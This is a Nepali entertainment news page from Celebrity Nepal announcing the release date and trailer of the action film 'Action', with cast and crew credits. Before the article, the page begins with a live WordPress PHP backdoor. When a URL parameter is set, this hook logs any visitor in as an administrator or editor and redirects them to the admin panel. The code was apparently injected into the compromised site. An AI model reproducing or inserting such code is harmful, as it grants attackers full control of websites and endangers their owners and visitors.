// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); एक्सन नै एक्सनले भरिएको चलचित्र एक्सन यस्तो छ ट्रेलर – Celebrity Nepal

एक्सन नै एक्सनले भरिएको चलचित्र एक्सन यस्तो छ ट्रेलर


सेलिब्रेटी नेपाल काठमाडौँ
एक्सन प्रदान चलचित्र एक्सन जेठ १४ गते बाट सार्बजनिक प्रदर्शनमा आउने भएको छ चलचित्र युनिटले राजधानीमा एक औपचारिक कार्यक्रमको आयोजना गर्दै चलचित्रको प्रदर्शन मिति र ट्रेलर सार्बजनिक गरेको हो । एक्सन किङ्ग भनेर चिनिने नायक शिव श्रेष्ठ,प्रमोद दिप,नायिका जेनिशा के.सी.,कसम गुरुङ,दिनेश घिमिरे,राज थपलिया,रक्षा गुरागाईं बिशाल पहाडीको मुख्य भूमिका रहेको चलचित्र लाइ राजु अर्यालले लेखन तथा निर्देशन गरेका हुन् ।
action movie
शर्मिला तामाङ र दिपेन्द्र कोइरालाको लगानी रहेको चलचित्रमा प्रल्हाद बोगटीको संगीत,कुमार महर्जनको द्वन्द,गोबिन्द प्रभात र राम प्यासीको नृत्य रहेको छ चलचित्र लाइ किरण राज थापाले सम्पादन गरेका हुन् ।

सेलिब्रिटी नेपाल.कम

सूचना तथा प्रसारण विभाग दर्ता नम्बर ५३७ – २०७३ / ०७४

संचालक / प्रकाशक: कल्पना सापकोटा
सम्पादक: आनन्द अधिकारी
समाचार प्रमुख: रघुनाथ सापकोटा
सम्पर्क:
call/whatsapp: +977 9851071873 | email: celebritynepal@gmail.com

Supported by Glamour Nepal | Shopping Partner: Kavya Online Store

Copyright © 2012 - 2026 | All Right Reserved.